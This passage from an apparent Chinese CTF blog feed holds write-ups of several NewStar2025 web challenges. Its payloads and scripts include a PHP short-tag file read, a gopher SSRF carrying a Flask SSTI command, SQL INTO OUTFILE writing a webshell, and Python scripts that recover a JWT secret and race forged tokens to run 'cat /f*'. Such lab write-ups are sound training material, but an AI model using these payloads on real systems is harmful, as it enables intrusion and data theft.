id="8-NewStar2025-week3-mirror-gate"><a href="#8-NewStar2025-week3-mirror-gate" class="headerlink" title="8.NewStar2025-week3 mirror_gate"></a>8.NewStar2025-week3 mirror_gate</h1><p>第一次见到直接可以看到.htaccess的文件上传,特此记录一下</p><p>扫目录扫出来.htaccess</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130222002361.png" alt="image-20251130222002361"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130222017476.png" alt="image-20251130222017476"></p><p>webp当php执行,然后就很常规了,短标签绕过</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><?=show_source('/flag.php');?></span><br></pre></td></tr></table></figure><p>直接拿到flag</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130222138660.png" alt="image-20251130222138660"></p><h1 id="9-NewStar2025-week4-SSTI-在哪里?"><a href="#9-NewStar2025-week4-SSTI-在哪里?" class="headerlink" title="9.NewStar2025-week4 SSTI 在哪里?"></a>9.NewStar2025-week4 SSTI 在哪里?</h1><p>存在 ssrf.</p><p>file:///etc/passwd读到是 flask 服务</p><p>file:///app/app.py读源码</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask import Flask, request, render_template_string</span><br><span class="line">import os</span><br><span class="line"></span><br><span class="line">app = <span class="title function_ invoke__">Flask</span>(__name__)</span><br><span class="line"></span><br><span class="line">@app.<span class="title function_ invoke__">route</span>(<span class="string">'/'</span>, methods=[<span class="string">'GET'</span>,<span class="string">'POST'</span>])</span><br><span class="line">def <span class="title function_ invoke__">index</span>():</span><br><span class="line"> template = request.form.<span class="title function_ invoke__">get</span>(<span class="string">'template'</span>, <span class="string">'Hello World!'</span>)</span><br><span class="line"> <span class="keyword">return</span> <span class="title function_ invoke__">render_template_string</span>(template)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> app.<span class="title function_ invoke__">run</span>(host=<span class="string">'127.0.0.1'</span>, port=<span class="number">5001</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>将 name 接受的东西给到了 template,感觉有 SSTI</p><p>用 gopher 协议打,先认识一下gopher 协议</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">gopher协议</span><br><span class="line"> 概念:</span><br><span class="line"> 1.gopher协议是一种信息查找系统,它将internet上的文件组织成某种索引,方便用户从internet的一处带到另一处。但在www出现后,gopher就失去了昔日的辉煌。</span><br><span class="line"> 2.现在它已过时。它只支持文本,不支持图像。</span><br><span class="line"> 3.gopher协议可以做很多事情,特别是在ssrf中可以发挥很多重要的作用,利用此协议可以攻击内网的FTP,Telnnet,Redis,Memcache,也可进行GET,POST请求</span><br><span class="line"> 4.可以通过gopher协议将get请求伪装成post请求,他是SSRF利用中一个最强大的协议(俗称万能协议),可用于反弹shell</span><br><span class="line"> 语法:gopher://127.0.0.1:80/_{TCP/IP数据流}</span><br><span class="line"> 注意:</span><br><span class="line"> 1.这里的_不能省略</span><br><span class="line"> 2.这里的端口默认是70,但要具体情况具体而定,http就是80,https就是443</span><br><span class="line"> 3.如果发起post请求,回车换行符就必须要使用%0D%0A,告诉计算机你已经执行完了。如果多个参数,参数之间的&也需要进行URL编码</span><br><span class="line"> 需要的条件:在构造的时候,只需要保留这几样必要的东西就行</span><br><span class="line"> gopher : //127.0.0.1:80/_POST /flag.php HTTP/1.1</span><br><span class="line"> Host : challenge-0cd16c73a7cf875a.sandbox.ctfhub.com:10800</span><br><span class="line"> Content-Type : application/x-www-form-urlencoded</span><br><span class="line"> Content-Length : 36</span><br></pre></td></tr></table></figure><p>Flag 在环境变量</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url=gopher://127.0.0.1:5000/_GET%2520%252F%2520HTTP%252F1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250AContent-Length%253A%252056%250A%250Aname%253D%257B%257Blipsum.__globals__%255B'os'%255D%255B'popen'%255D('env').read()%257D%257D</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130223209913.png" alt="image-20251130223209913"></p><p>成功</p><h1 id="10-NewStar2025-week4-sqlupload"><a href="#10-NewStar2025-week4-sqlupload" class="headerlink" title="10.NewStar2025-week4 sqlupload"></a>10.NewStar2025-week4 sqlupload</h1><p>很新的知识点,在特定的位置注入你的恶意代码,然后想办法将其保存在可被执行的位置</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?order=upload_time INTO OUTFILE '/var/www/html/1.php'</span><br></pre></td></tr></table></figure><p>问题在 getFileList.php</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130225217389.png" alt="image-20251130225217389"></p><p>我们可以控制 order 参数将 filename 写入到文件</p><p>通过抓包传一个文件名是一句话木马的东西上去</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130225233805.png" alt="image-20251130225233805"></p><p>把它保存在1.php</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?order=upload_time INTO OUTFILE '/var/www/html/1.php'</span><br></pre></td></tr></table></figure><p>访问1.php,post传命令</p><p>但是直接读取 /readFlag是读不了的</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130225409391.png" alt="image-20251130225409391"></p><p>重定向到2.txt,直接读2.txt</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1=system('/readFlag>2.txt');</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130225801015.png" alt="image-20251130225801015"></p><p>拿到flag</p><h1 id="11-NewStar2025-week5-眼熟的计算器"><a href="#11-NewStar2025-week5-眼熟的计算器" class="headerlink" title="11.NewStar2025-week5 眼熟的计算器"></a>11.NewStar2025-week5 眼熟的计算器</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Source code recreated from a .class file by IntelliJ IDEA</span></span><br><span class="line"><span class="comment">// (powered by FernFlower decompiler)</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"></span><br><span class="line">package org.example.newstar.controller;</span><br><span class="line"></span><br><span class="line">import javax.script.ScriptEngineManager;</span><br><span class="line">import org.springframework.stereotype.Controller;</span><br><span class="line">import org.springframework.ui.Model;</span><br><span class="line">import org.springframework.web.bind.annotation.GetMapping;</span><br><span class="line">import org.springframework.web.bind.annotation.RequestParam;</span><br><span class="line"></span><br><span class="line">@Controller</span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">NewstarController</span> </span>{</span><br><span class="line"> <span class="keyword">private</span> String[] BLACKLIST = <span class="keyword">new</span> <span class="title class_">String</span>[]{<span class="string">"import"</span>, <span class="string">"java.lang.Runtime"</span>, <span class="string">"new"</span>};</span><br><span class="line"></span><br><span class="line"> <span class="keyword">private</span> String <span class="title function_ invoke__">calculate</span>(String content) throws <span class="built_in">Exception</span> {</span><br><span class="line"> <span class="keyword">for</span>(String word : this.BLACKLIST) {</span><br><span class="line"> <span class="keyword">if</span> (content.<span class="title function_ invoke__">contains</span>(word)) {</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"Blacklisted word detected: "</span> + word;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> Object result = (<span class="keyword">new</span> <span class="title class_">ScriptEngineManager</span>()).<span class="title function_ invoke__">getEngineByName</span>(<span class="string">"js"</span>).<span class="keyword">eval</span>(content);</span><br><span class="line"> <span class="keyword">return</span> result.<span class="title function_ invoke__">toString</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> @<span class="title function_ invoke__">GetMapping</span>({<span class="string">"/"</span>})</span><br><span class="line"> <span class="keyword">public</span> String <span class="title function_ invoke__">home</span>(Model model) throws <span class="built_in">Exception</span> {</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"index"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> @<span class="title function_ invoke__">GetMapping</span>({<span class="string">"/calc"</span>})</span><br><span class="line"> <span class="keyword">public</span> String <span class="title function_ invoke__">status</span>(@<span class="title function_ invoke__">RequestParam</span>(<span class="string">"content"</span>) String content, Model model) throws <span class="built_in">Exception</span> {</span><br><span class="line"> model.<span class="title function_ invoke__">addAttribute</span>(<span class="string">"result"</span>, this.<span class="title function_ invoke__">calculate</span>(content));</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"index"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>直接ai梭哈,猜/flag</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Java.type('java.nio.file.Files').readAllLines(Java.type('java.nio.file.Paths').get("/flag"),Java.type('java.nio.charset.StandardCharsets').UTF_8).toString()</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130230036669.png" alt="image-20251130230036669"></p><h1 id="12-NewStar2025-week5-废弃的网站"><a href="#12-NewStar2025-week5-废弃的网站" class="headerlink" title="12.NewStar2025-week5 废弃的网站"></a>12.NewStar2025-week5 废弃的网站</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask import Flask, request, render_template, abort, redirect, render_template_string</span><br><span class="line">import jwt, hashlib, time</span><br><span class="line"></span><br><span class="line">app = <span class="title function_ invoke__">Flask</span>(__name__)</span><br><span class="line">time_started = <span class="title function_ invoke__">round</span>(time.<span class="title function_ invoke__">time</span>())</span><br><span class="line"><span class="keyword">print</span>(f<span class="string">"System started at {time_started}"</span>)</span><br><span class="line">APP_SECRET = hashlib.<span class="title function_ invoke__">sha256</span>(<span class="title function_ invoke__">str</span>(time_started).<span class="title function_ invoke__">encode</span>()).<span class="title function_ invoke__">hexdigest</span>()</span><br><span class="line"></span><br><span class="line">tempuser = None</span><br><span class="line"></span><br><span class="line">USER_DB = {</span><br><span class="line"> <span class="string">"admin"</span>: {<span class="string">"id"</span>: <span class="number">1</span>, <span class="string">"role"</span>: <span class="string">"admin"</span>, <span class="string">"name"</span>: <span class="string">"Administrator"</span>},</span><br><span class="line"> <span class="string">"guest"</span>: {<span class="string">"id"</span>: <span class="number">2</span>, <span class="string">"role"</span>: <span class="string">"guest"</span>, <span class="string">"name"</span>: <span class="string">"Guest User"</span>},</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">def <span class="title function_ invoke__">admin_required</span>(f):</span><br><span class="line"> def <span class="title function_ invoke__">wrapper</span>(*args, **kwargs):</span><br><span class="line"> cookie = request.cookies.<span class="title function_ invoke__">get</span>(<span class="string">'session'</span>, None)</span><br><span class="line"> <span class="keyword">if</span> cookie is None:</span><br><span class="line"> </span><br><span class="line"> response = <span class="title function_ invoke__">redirect</span>(<span class="string">'/'</span>)</span><br><span class="line"> session = jwt.<span class="title function_ invoke__">encode</span>(USER_DB[<span class="string">'guest'</span>], APP_SECRET, algorithm=<span class="string">'HS256'</span>)</span><br><span class="line"> response.<span class="title function_ invoke__">set_cookie</span>(<span class="string">'session'</span>, session)</span><br><span class="line"> <span class="keyword">return</span> response</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> user_data = jwt.<span class="title function_ invoke__">decode</span>(cookie, APP_SECRET, algorithms=[<span class="string">'HS256'</span>])</span><br><span class="line"> <span class="keyword">if</span> user_data[<span class="string">'role'</span>] != <span class="string">'admin'</span>:</span><br><span class="line"> <span class="title function_ invoke__">abort</span>(<span class="number">403</span>, description=<span class="string">"Admin access required."</span>)</span><br><span class="line"> <span class="keyword">if</span> user_data[<span class="string">'name'</span>] != <span class="string">'Administrator'</span>:</span><br><span class="line"> <span class="title function_ invoke__">abort</span>(<span class="number">403</span>, description=<span class="string">"Admin access required."</span>)</span><br><span class="line"> time.<span class="title function_ invoke__">sleep</span>(<span class="number">0.15</span>)</span><br><span class="line"> except jwt.InvalidTokenError:</span><br><span class="line"> <span class="title function_ invoke__">abort</span>(<span class="number">401</span>, description = f<span class="string">"Session expired. Please log in again. System has been running {round(time.time() - time_started)} seconds."</span>)</span><br><span class="line"> <span class="keyword">return</span> <span class="title function_ invoke__">f</span>(*args, **kwargs)</span><br><span class="line"> wrapper.__name__ = f.__name__</span><br><span class="line"> <span class="keyword">return</span> wrapper</span><br><span class="line"></span><br><span class="line">@app.before_request<span class="comment">#Flask的请求钩子,它会在每个http请求处理之前自动执行</span></span><br><span class="line">def <span class="title function_ invoke__">load_user</span>():</span><br><span class="line"> <span class="keyword">if</span> request.endpoint == <span class="string">'static'</span>:</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> <span class="keyword">global</span> tempuser<span class="comment">#全局变量</span></span><br><span class="line"> cookie = request.cookies.<span class="title function_ invoke__">get</span>(<span class="string">'session'</span>, None)</span><br><span class="line"> <span class="keyword">if</span> cookie is None:</span><br><span class="line"> tempuser = USER_DB[<span class="string">'guest'</span>]</span><br><span class="line"> session = jwt.<span class="title function_ invoke__">encode</span>(tempuser, APP_SECRET, algorithm=<span class="string">'HS256'</span>)</span><br><span class="line"> response = <span class="title function_ invoke__">redirect</span>(request.path)</span><br><span class="line"> response.<span class="title function_ invoke__">set_cookie</span>(<span class="string">'session'</span>, session)</span><br><span class="line"> <span class="keyword">return</span> response</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> user_data = jwt.<span class="title function_ invoke__">decode</span>(cookie, APP_SECRET, algorithms=[<span class="string">'HS256'</span>])</span><br><span class="line"> tempuser = user_data</span><br><span class="line"> except jwt.InvalidTokenError:</span><br><span class="line"> session = jwt.<span class="title function_ invoke__">encode</span>(USER_DB[<span class="string">'guest'</span>], APP_SECRET, algorithm=<span class="string">'HS256'</span>)</span><br><span class="line"> content = <span class="title function_ invoke__">render_template_string</span>(</span><br><span class="line"> <span class="string">"Session expired. Please log in again. System has been running %d seconds."</span> %</span><br><span class="line"> (<span class="title function_ invoke__">round</span>(time.<span class="title function_ invoke__">time</span>() - time_started))</span><br><span class="line"> )</span><br><span class="line"> response = app.<span class="title function_ invoke__">make_response</span>((content, <span class="number">401</span>))</span><br><span class="line"> response.<span class="title function_ invoke__">set_cookie</span>(<span class="string">'session'</span>, session)</span><br><span class="line"> <span class="keyword">return</span> response</span><br><span class="line"> </span><br><span class="line">@app.<span class="title function_ invoke__">route</span>(<span class="string">'/'</span>, methods=[<span class="string">'GET'</span>])</span><br><span class="line">def <span class="title function_ invoke__">home</span>():</span><br><span class="line"> <span class="keyword">return</span> <span class="title function_ invoke__">render_template</span>(<span class="string">'index.html'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.<span class="title function_ invoke__">route</span>(<span class="string">"/admin"</span>, methods=[<span class="string">'GET'</span>])</span><br><span class="line">@admin_required</span><br><span class="line">def <span class="title function_ invoke__">admin_panel</span>():</span><br><span class="line"> <span class="keyword">global</span> tempuser</span><br><span class="line"> <span class="keyword">return</span> <span class="title function_ invoke__">render_template_string</span>(<span class="string">"Welcome Back, %s"</span> % tempuser[<span class="string">'name'</span>])</span><br><span class="line"></span><br><span class="line">@app.<span class="title function_ invoke__">route</span>(<span class="string">"/static/<path:filename>"</span>, methods=[<span class="string">'GET'</span>])</span><br><span class="line">def <span class="title function_ invoke__">serve_static</span>(filename):</span><br><span class="line"> <span class="keyword">if</span> not filename.<span class="title function_ invoke__">endswith</span>(<span class="string">'.png'</span>):</span><br><span class="line"> <span class="title function_ invoke__">abort</span>(<span class="number">403</span>, description=<span class="string">"Only .png files are allowed."</span>)</span><br><span class="line"> <span class="keyword">return</span> app.<span class="title function_ invoke__">send_static_file</span>(filename)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> app.<span class="title function_ invoke__">run</span>(host=<span class="string">"0.0.0.0"</span>, port=<span class="number">5000</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>发现render_template_string的ssti,但是想执行命令要admin,密钥是服务器启动时间,当jwt解析错误就会回显系统运行的时间,考虑时间误差,计算出的时间要+-1试试,所以写代码</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">import hashlib</span><br><span class="line">import re</span><br><span class="line"></span><br><span class="line">def <span class="title function_ invoke__">get_app_secret</span>():</span><br><span class="line"> target_url = <span class="string">"http://8.147.132.32:24710/admin"</span></span><br><span class="line"> cookies = {</span><br><span class="line"> <span class="string">'td_cookie'</span>: <span class="string">'2928931217'</span>,</span><br><span class="line"> <span class="string">'session'</span>: <span class="string">'1'</span></span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> response = requests.<span class="title function_ invoke__">get</span>(target_url, cookies=cookies, timeout=<span class="number">5</span>)</span><br><span class="line"> <span class="keyword">match</span> = re.<span class="title function_ invoke__">search</span>(r<span class="string">'System has been running (\d+) seconds'</span>, response.text)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">match</span>:</span><br><span class="line"> uptime = <span class="keyword">int</span>(<span class="keyword">match</span>.<span class="title function_ invoke__">group</span>(<span class="number">1</span>))</span><br><span class="line"> current_time = <span class="keyword">int</span>(time.<span class="title function_ invoke__">time</span>())</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># 考虑时间误差,计算多个可能的启动时间</span></span><br><span class="line"> <span class="keyword">for</span> offset in <span class="title function_ invoke__">range</span>(-<span class="number">1</span>, <span class="number">2</span>): </span><br><span class="line"> time_started = current_time - uptime + offset</span><br><span class="line"> app_secret = hashlib.<span class="title function_ invoke__">sha256</span>(<span class="title function_ invoke__">str</span>(time_started).<span class="title function_ invoke__">encode</span>()).<span class="title function_ invoke__">hexdigest</span>()</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">print</span>(f<span class="string">"启动时间({offset}): {time_started}"</span>)</span><br><span class="line"> <span class="keyword">print</span>(f<span class="string">"密钥({offset}): {app_secret}"</span>)</span><br><span class="line"> <span class="keyword">print</span>(<span class="string">"-"</span> * <span class="number">50</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">print</span>(<span class="string">"无法提取运行时间"</span>)</span><br><span class="line"> except <span class="built_in">Exception</span> <span class="keyword">as</span> e:</span><br><span class="line"> <span class="keyword">print</span>(f<span class="string">"请求失败: {e}"</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> <span class="title function_ invoke__">get_app_secret</span>()</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>伪造admin</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">import jwt</span><br><span class="line">import datetime</span><br><span class="line"></span><br><span class="line"><span class="comment"># 定义标头(Headers)</span></span><br><span class="line">headers = {</span><br><span class="line"> <span class="string">"alg"</span>: <span class="string">"HS256"</span>,</span><br><span class="line"> <span class="string">"typ"</span>: <span class="string">"JWT"</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment"># 定义有效载体(Payload)</span></span><br><span class="line">token_dict = {</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">1</span>,</span><br><span class="line"> <span class="string">"role"</span>: <span class="string">"admin"</span>,</span><br><span class="line"> <span class="string">"name"</span>: <span class="string">"Administrator"</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment"># 密钥</span></span><br><span class="line">secret = <span class="string">'c484d1e6ed651fc48231d0629ec282172fe9f41c0d74fd8c2ea34bc325ca8b83'</span></span><br><span class="line"></span><br><span class="line">jwt_token = jwt.<span class="title function_ invoke__">encode</span>(token_dict, secret, algorithm=<span class="string">'HS256'</span>, headers=headers)</span><br><span class="line"><span class="keyword">print</span>(<span class="string">"JWT Token:"</span>, jwt_token)</span><br><span class="line"></span><br></pre></td></tr></table></figure><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import threading</span><br><span class="line">import jwt</span><br><span class="line"></span><br><span class="line">target_url = <span class="string">"http://8.147.132.32:24710"</span></span><br><span class="line">secret = <span class="string">'c484d1e6ed651fc48231d0629ec282172fe9f41c0d74fd8c2ea34bc325ca8b83'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 创建两个token</span></span><br><span class="line">admin_token = jwt.<span class="title function_ invoke__">encode</span>({<span class="string">"id"</span>: <span class="number">1</span>, <span class="string">"role"</span>: <span class="string">"admin"</span>, <span class="string">"name"</span>: <span class="string">"Administrator"</span>}, secret, algorithm=<span class="string">'HS256'</span>)</span><br><span class="line">ssti_token = jwt.<span class="title function_ invoke__">encode</span>({<span class="string">"id"</span>: <span class="number">2</span>, <span class="string">"role"</span>: <span class="string">"guest"</span>, <span class="string">"name"</span>: <span class="string">"{{lipsum.__globals__.os.popen('cat /f*').read()}}"</span>}, secret, algorithm=<span class="string">'HS256'</span>)</span><br><span class="line"></span><br><span class="line">def <span class="title function_ invoke__">send_admin_request</span>():</span><br><span class="line"> <span class="string">""</span><span class="string">"发送admin请求"</span><span class="string">""</span></span><br><span class="line"> cookies = {<span class="string">'td_cookie'</span>: <span class="string">'2928931217'</span>, <span class="string">'session'</span>: admin_token}</span><br><span class="line"> response = requests.<span class="title function_ invoke__">get</span>(f<span class="string">"{target_url}/admin"</span>, cookies=cookies)</span><br><span class="line"> <span class="keyword">print</span>(f<span class="string">"[+] 成功! 响应: {response.text}"</span>)</span><br><span class="line"></span><br><span class="line">def <span class="title function_ invoke__">send_ssti_request</span>():</span><br><span class="line"> <span class="string">""</span><span class="string">"发送SSTI请求到首页来设置tempuser"</span><span class="string">""</span></span><br><span class="line"> cookies = {<span class="string">'td_cookie'</span>: <span class="string">'2928931217'</span>, <span class="string">'session'</span>: ssti_token}</span><br><span class="line"> response = requests.<span class="title function_ invoke__">get</span>(target_url, cookies=cookies) <span class="comment"># 访问首页来设置tempuser</span></span><br><span class="line"> <span class="comment"># 这里不需要打印,因为我们只关心admin请求的结果</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 创建并启动线程</span></span><br><span class="line"><span class="keyword">for</span> i in <span class="title function_ invoke__">range</span>(<span class="number">100</span>): <span class="comment"># 尝试100次</span></span><br><span class="line"> t1 = threading.<span class="title function_ invoke__">Thread</span>(target=send_admin_request)</span><br><span class="line"> t2 = threading.<span class="title function_ invoke__">Thread</span>(target=send_ssti_request)</span><br><span class="line"> t1.<span class="title function_ invoke__">start</span>()</span><br><span class="line"> t2.<span class="title function_ invoke__">start</span>()</span><br><span class="line"> t1.<span class="title function_ invoke__">join</span>()</span><br><span class="line"> t2.<span class="title function_ invoke__">join</span>()</span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="下周目标-1"><a href="#下周目标-1" class="headerlink" title="下周目标"></a>下周目标</h1><p>把剩下的那道题打通,并尽力打isctf吧</p><p>文章直达:</p><p><a href="https://shaneior.github.io/2025/11/26/%E4%BD%A0%E7%BC%BA%E5%A4%B1%E7%9A%84%E9%82%A3%E9%97%A8%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%AF%BE/">https://shaneior.github.io/2025/11/26/%E4%BD%A0%E7%BC%BA%E5%A4%B1%E7%9A%84%E9%82%A3%E9%97%A8%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%AF%BE/</a></p>]]></content>
</entry>
<entry>
<title>本站第一条博客(置顶)</title>
<link href="/2025/11/23/First%20post/"/>
<url>/2025/11/23/First%20post/</url>
